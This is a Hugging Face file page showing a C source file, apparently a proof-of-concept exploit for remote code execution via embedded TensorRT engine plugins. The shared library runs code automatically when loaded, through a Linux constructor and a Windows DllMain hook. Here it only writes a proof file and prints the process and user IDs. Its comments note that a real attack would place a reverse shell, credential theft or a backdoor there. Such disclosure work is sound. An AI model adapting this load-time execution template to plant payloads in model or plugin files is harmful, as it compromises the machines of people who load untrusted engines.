Hugging Face's logo

treforbenbow
/
tensorrt-engine-rce-poc

Model card Files
xet
 Community
tensorrt-engine-rce-poc / malicious_plugin.c
treforbenbow's picture
treforbenbow
Upload malicious_plugin.c with huggingface_hub
2774b43 verified
raw
history blame contribute delete
2.18 kB
/*
 * Malicious TensorRT Plugin - Proof of Concept
 *
 * This shared library executes arbitrary code when loaded.
 * - Linux: __attribute__((constructor)) runs on dlopen()
 * - Windows: DllMain with DLL_PROCESS_ATTACH runs on LoadLibrary()
 *
 * Both execute BEFORE any TensorRT API interaction.
 *
 * For PoC: creates a proof file and prints to stderr.
 * In a real attack: reverse shell, credential theft, backdoor, etc.
 */
#include <stdio.h>
#include <stdlib.h>
#ifdef _WIN32
#include <windows.h>
#include <process.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
 if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
 /* PoC: Write proof of execution */
 FILE *f = fopen("C:\\temp\\tensorrt_rce_poc.txt", "w");
 if (!f) f = fopen("tensorrt_rce_poc.txt", "w");
 if (f) {
 fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin LoadLibrary()\n");
 fprintf(f, "PID: %d\n", _getpid());
 fclose(f);
 }
 fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n");
 fprintf(stderr, "[!] Proof written to tensorrt_rce_poc.txt\n");
 fprintf(stderr, "[!] PID: %d\n\n", _getpid());
 }
 return TRUE;
}
/* TensorRT plugin stubs */
__declspec(dllexport) void setLoggerFinder(void *finder) { (void)finder; }
__declspec(dllexport) void* getCreators(int *n) { if (n) *n = 0; return NULL; }
#else
#include <unistd.h>
__attribute__((constructor))
void malicious_init(void) {
 FILE *f = fopen("/tmp/tensorrt_rce_poc", "w");
 if (f) {
 fprintf(f, "TensorRT Engine RCE PoC - Code executed via embedded plugin dlopen()\n");
 fprintf(f, "PID: %d\nUID: %d\n", getpid(), getuid());
 fclose(f);
 }
 fprintf(stderr, "\n[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!\n");
 fprintf(stderr, "[!] Proof written to /tmp/tensorrt_rce_poc\n");
 fprintf(stderr, "[!] PID: %d, UID: %d\n\n", getpid(), getuid());
}
/* TensorRT plugin stubs */
void setLoggerFinder(void *finder) { (void)finder; }
void* getCreators(int *n) { if (n) *n = 0; return NULL; }
#endif